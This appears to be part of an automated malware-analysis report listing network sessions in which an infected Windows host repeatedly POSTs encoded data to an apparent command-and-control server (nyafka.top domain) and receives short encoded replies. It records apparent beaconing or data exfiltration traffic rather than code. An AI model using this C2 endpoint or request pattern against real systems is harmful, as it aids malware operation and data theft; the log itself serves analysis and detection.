                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7870&min_rtt=1650&rtt_var=13060&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2201&delivery_rate=28395&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 39 38 0d 0a 03 1d 24 57 30 3e 37 00 37 28 21 13 3f 04 23 1d 2a 33 3a 59 2d 07 30 11 26 34 20 14 26 12 28 5a 23 2f 3a 01 2b 38 07 12 27 50 2b 0d 2b 2b 20 5c 04 1f 24 14 3c 16 00 0a 2a 2f 3a 5f 24 20 25 5b 31 33 24 11 27 3d 33 59 27 5f 22 56 34 29 20 0f 38 55 26 57 2f 28 24 1e 28 27 28 12 24 04 2f 50 0f 10 3b 0b 2d 07 3b 58 22 1f 3e 56 36 0a 37 13 20 35 01 02 29 03 0d 16 22 01 00 04 33 0d 39 53 37 31 20 0c 24 23 33 17 3f 57 2c 52 2a 23 24 55 2c 02 2c 49 02 3f 58 52 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 98$W0>77(!?#*3:Y-0&4 &(Z#/:+8'P+++ \$<*/:_$ %[13$'=3Y'_"V4) 8U&W/($('($/P;-;X">V67 5)"39S71 $#3?W,R*#$U,,I?XR0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          112192.168.2.550095104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:24.363442898 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:24.707474947 CET2532OUTData Raw: 55 55 5e 57 5c 58 56 5d 5e 5f 57 54 56 56 59 59 57 51 58 58 50 5d 56 5c 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UU^W\XV]^_WTVVYYWQXXP]V\[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#(+43:*=\.$?>5*13*R+"/=?85-4-#_&'P-
                                                                                                          Jan 8, 2025 17:14:24.820769072 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:25.201282978 CET811INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:25 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kZu4gXp%2B6rDyFwUrwbgTLrdIjDkQofWDhPf3Qp%2FtKn2SdUsPt5mZDSq%2BhnHsvRZtkWae40w%2FfJAVBGnW0j18Jv7naaAV16V5m9aMolJNxM%2BQxhGfkkIBhyH4M8HN0N%2FI65wcIp0r"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7afcde85c34f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3086&min_rtt=1496&rtt_var=3741&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=102686&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          113192.168.2.550096104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:25.338285923 CET325OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Jan 8, 2025 17:14:25.691873074 CET2532OUTData Raw: 55 55 5b 50 59 51 56 5b 5e 5f 57 54 56 5b 59 53 57 53 58 5f 50 54 56 58 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UU[PYQV[^_WTV[YSWSX_PTVX[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ ^?( %3)=)[80)%*8:0;)<"X(?" ./#_&'P-3
                                                                                                          Jan 8, 2025 17:14:25.779170036 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:26.020885944 CET805INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:25 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cHdx%2B4zXJA9hxYEmMnEaA20prLHXUXGwMrieMnnPYEQ0IXlFf%2FspE9UHU56b94vjC9uAkZ1Uw4ad4Y8ZlwG5Z%2BKJSBj4GUm4zfZatK72GFmtkaj9ji6srHGfJWn3svnTh04tKfCf"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7b02dea4424b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2075&min_rtt=1561&rtt_var=1614&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2857&delivery_rate=257223&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          114192.168.2.550097104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:26.203778982 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:26.551230907 CET2532OUTData Raw: 55 5c 5e 50 59 5a 53 5f 5e 5f 57 54 56 58 59 52 57 52 58 52 50 55 56 5e 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: U\^PYZS_^_WTVXYRWRXRPUV^[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#+/^$01>>%\;4$>Z)+23"<2 =?0]"-<:#_&'P-?
                                                                                                          Jan 8, 2025 17:14:26.649157047 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:26.887644053 CET804INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:26 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ms5LCSQYgnCwXfopP2SjXS5x8LVuHLnC%2FjaGw41cqFZZJnpe2jbq5Dki%2FYRfNrgB0HkGc%2F2d%2BjEPJOhCW8QhzCO8Cp6tyRydn6JkXLzkK9GzASv%2FMuItVHKDTlvcv6gBbONFsV3W"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7b084a47727b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3453&min_rtt=1989&rtt_var=3674&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=106538&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a
                                                                                                          Data Ascii: 41U][
                                                                                                          Jan 8, 2025 17:14:26.974225998 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          115192.168.2.550098104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:27.104093075 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:27.457564116 CET2532OUTData Raw: 50 50 5e 50 5c 58 53 5b 5e 5f 57 54 56 58 59 52 57 51 58 5b 50 5d 56 5e 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PP^P\XS[^_WTVXYRWQX[P]V^[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#<;?^3:>)];+])!>85Z'(:S+(=?4\".;-?#_&'P-?
                                                                                                          Jan 8, 2025 17:14:27.576348066 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:27.736857891 CET807INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:27 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KLQ83zgiehOB%2BezWTcvZYfWiFvjffDNXQ9ayeruDbnO97lteMcdLaHdSRu%2FiTr7eZGnD9T8LmYpXl1mdWg8AmpKtXIyQfCJhqsn3ZkdK6gvMAQiTVyEMC5Xx%2BWmrYUKDogm%2F4Te0"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7b0e0f4c43b3-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3029&min_rtt=1614&rtt_var=3435&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=112872&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          116192.168.2.550099104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:27.875309944 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2528
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:28.223128080 CET2528OUTData Raw: 55 5d 5e 57 59 59 56 5f 5e 5f 57 54 56 5e 59 58 57 5f 58 58 50 5a 56 5a 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: U]^WYYV_^_WTV^YXW_XXPZVZ[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#?(33"X>;7?\=.>)86$>V(8*5.;.#_&'P-/
                                                                                                          Jan 8, 2025 17:14:28.318521976 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:28.568339109 CET812INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:28 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UMHf2Glq1gP5MLpkD%2FvEMKKphjq2LM2w3Yq6Mz1nWWyXamm%2FDUbmJ8Sc7Q%2FNajG2b%2BXHCFZUHcDDxcGxJ3aq7S121hRAz55C%2BuQCb%2BqiOLaiDWK6tNFRcQXbS3iunbmMetttkZn%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7b12be9343b3-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3252&min_rtt=1575&rtt_var=3946&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2877&delivery_rate=97346&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          117192.168.2.550100104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:28.695310116 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:29.051270962 CET2532OUTData Raw: 55 55 5b 54 59 50 53 5b 5e 5f 57 54 56 57 59 5c 57 5f 58 5a 50 5a 56 58 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UU[TYPS[^_WTVWY\W_XZPZVX[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ *80#_>-)\/7+\>!)&+%)!$>? =:#_&'P-
                                                                                                          Jan 8, 2025 17:14:29.320823908 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:29.479343891 CET813INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:29 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u0csRrdNTUgtqe7uR2At1Mt%2BEugsGhYgnw1v3sZ%2FGZw4ZsUvrXRvVSTP510%2Bzmr8zn%2FFGroe%2B76buKiXEUotriORbRfQ7rAzdzDLxyQ%2FJSBQSDuEB3XiLyBlE3tXgozzhxD1D008"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7b18fb1f424b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=41925&min_rtt=41089&rtt_var=17082&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=30554&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          118192.168.2.550101104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:29.616286993 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          119192.168.2.550102104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:29.713725090 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 1852
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:30.066842079 CET1852OUTData Raw: 50 55 5e 5e 5c 58 56 5c 5e 5f 57 54 56 59 59 5d 57 52 58 5b 50 54 56 51 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PU^^\XV\^_WTVYY]WRX[PTVQ[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#*((32[*-;4?=>:&;%)!3*,46<-#_&'P-
                                                                                                          Jan 8, 2025 17:14:30.210479021 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:30.444108963 CET956INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:30 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6Go21iezAzR3tmIvl68XczzWsn3aYMR6MCubp8I2ReA3e5NuCl4VNsIZgzcdlR%2F9FyC3%2BlFIBnSYcYmwdyCOtzJZ9Lupl4BBU%2B7h1pu5ZdBLk0HTIhOjlloAXMnPfXv%2Fbg6WBkY3"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7b1e88ba0f5b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3298&min_rtt=1803&rtt_var=3666&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2201&delivery_rate=106073&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 39 38 0d 0a 03 1d 27 0c 27 3d 27 03 20 15 08 09 3c 39 30 06 2b 33 29 00 39 2a 2f 04 27 37 23 07 26 3f 20 5a 37 06 21 5f 3c 38 2d 10 24 18 2c 54 2b 01 20 5c 04 1f 27 00 3c 3b 2e 0c 3d 3f 25 05 26 33 29 58 25 23 24 1e 25 2e 2b 5d 33 39 22 56 34 2a 33 56 2e 30 25 0e 3a 3b 2f 00 28 34 28 59 33 2e 2f 50 0f 10 3b 0c 2c 2a 3f 58 21 32 26 1c 22 33 34 02 22 25 23 03 3d 2d 01 51 36 3f 03 15 27 0d 21 1a 37 1c 28 08 24 33 23 16 3c 22 28 10 2b 23 24 55 2c 02 2c 49 02 3f 58 52 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 98''=' <90+3)9*/'7#&? Z7!_<8-$,T+ \'<;.=?%&3)X%#$%.+]39"V4*3V.0%:;/(4(Y3./P;,*?X!2&"34"%#=-Q6?'!7($3#<"(+#$U,,I?XR0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          120192.168.2.550103104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:29.839637041 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:30.191817045 CET2532OUTData Raw: 55 52 5e 52 59 5a 56 59 5e 5f 57 54 56 5d 59 5a 57 56 58 58 50 5a 56 5d 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UR^RYZVY^_WTV]YZWVXXPZV][EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ Z?+<3>Z;<?>2(+9Z$+=)1/*Y(5-9?#_&'P-+
                                                                                                          Jan 8, 2025 17:14:30.303323030 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:30.556737900 CET806INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:30 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IH3gWPnK9bd2IfhhOe8RFJezjQmdM9kr3I5km%2FybVKElNkvHS07IOYWWT6sYcGOZqGtbimLBaALX0rLUq68szBlxbl8I%2BGDEeS%2BDldX2zHY%2Fv4hlVxULe3mgUTTPhGYPEhYJJpIU"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7b1f1a59727b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3753&min_rtt=2020&rtt_var=4223&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=91910&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          121192.168.2.550104104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:30.677690029 CET325OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Jan 8, 2025 17:14:31.035689116 CET2532OUTData Raw: 50 51 5e 56 59 5d 56 5b 5e 5f 57 54 56 5c 59 5e 57 5f 58 58 50 55 56 59 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PQ^VY]V[^_WTV\Y^W_XXPUVY[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#(8 $3&*8X=-&)8:$2(?>'5>4-?#_&'P-/
